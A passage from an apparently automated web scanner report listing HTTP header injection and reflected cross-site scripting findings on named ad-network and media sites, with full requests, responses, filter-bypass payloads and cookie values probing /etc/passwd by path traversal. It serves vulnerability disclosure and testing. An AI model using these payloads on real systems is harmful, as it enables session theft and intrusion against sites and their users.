The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4e04%0d%0adcb62044598 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=b4e04%0d%0adcb62044598&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:b4e04
dcb62044598
,collective728x9057523';expires=Sat, 17 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=92:91:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2624
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='b4e04
dcb6
...[SNIP]...

3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 1bc99%0d%0af3d004c45 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=1bc99%0d%0af3d004c45&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=2; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 1bc99
f3d004c45
;expires=Mon, 17 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5099
Date: Sat, 17 Sep 2011 01:49:02 GMT
Connection: close



3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload f8960%0d%0a9818607d76e was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /dmm/servlet/dmm?rurl=f8960%0d%0a9818607d76e&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000187%2C826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1986338424%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 01:49:27 GMT
X-Name: dmm-s01
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Mon, 16-Sep-2013 01:49:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 01:49:27 GMT; Path=/
Location: http://usadmm.dotomi.com/dmm/servlet/f8960
9818607d76e

Content-Length: 0
Content-Type: text/plain


4. Cross-site scripting (reflected)  previous  next
There are 256 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload aa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d was submitted in the REST URL parameter 5. This input was echoed as aa5fa*/alert(1)//0f95b5b210d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.jsaa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d?cb=v9.00 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 145111
Content-Type: text/javascript
Last-Modified: Sat, 17 Sep 2011 01:02:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:02:31 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=272
Date: Sat, 17 Sep 2011 01:02:32 GMT
Connection: close


/**
* @filepath: ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleteraa5fa*/alert(1)//0f95b5b210d
* @created: Fri, 16 Sep 11 18:02:32 -0700
*/


/**
* @filepath: /utils/jquery.ifixpng2.js
* @created: Fri, 16 Sep 11 18:02:31 -0700
*/
;(function($){$.ifixpng=function(customPixel){$.ifixpng.pixel=cu
...[SNIP]...

4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/sfp/omnitureconfig/

Issue detail

The value of the pageURL request parameter is copied into the XML document as plain text between tags. The payload f23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 was submitted in the pageURL parameter. This input was echoed as f23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /service/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angelsf23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1037
Content-Type: text/xml
Last-Modified: Sat, 17 Sep 2011 01:03:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed04
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:03:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=279
Date: Sat, 17 Sep 2011 01:03:31 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<omnitureProfile account="wdgabccom" visitorNamespace="abc" trackingServer="w88.go.com" trackingServerSecure="sw88.go.com" dc="112">

<param id="prop13" value="
...[SNIP]...
<param id="pageURL" value="http://beta.abc.go.com/shows/charlies-angelsf23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1" enabled="true" />
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f413'-alert(1)-'1042a85aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:57 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:57 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9849'-alert(1)-'3c99bede0bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:55 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:55 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3030f'-alert(1)-'78b5323d0b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:47 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1cb6ad6c2dd07ed8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86817'-alert(1)-'7a10fc56168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:10 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b3a'-alert(1)-'ebe641e9daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:16 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:16 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 787bc'-alert(1)-'bb972807ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:02 GMT
Content-Length: 485

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
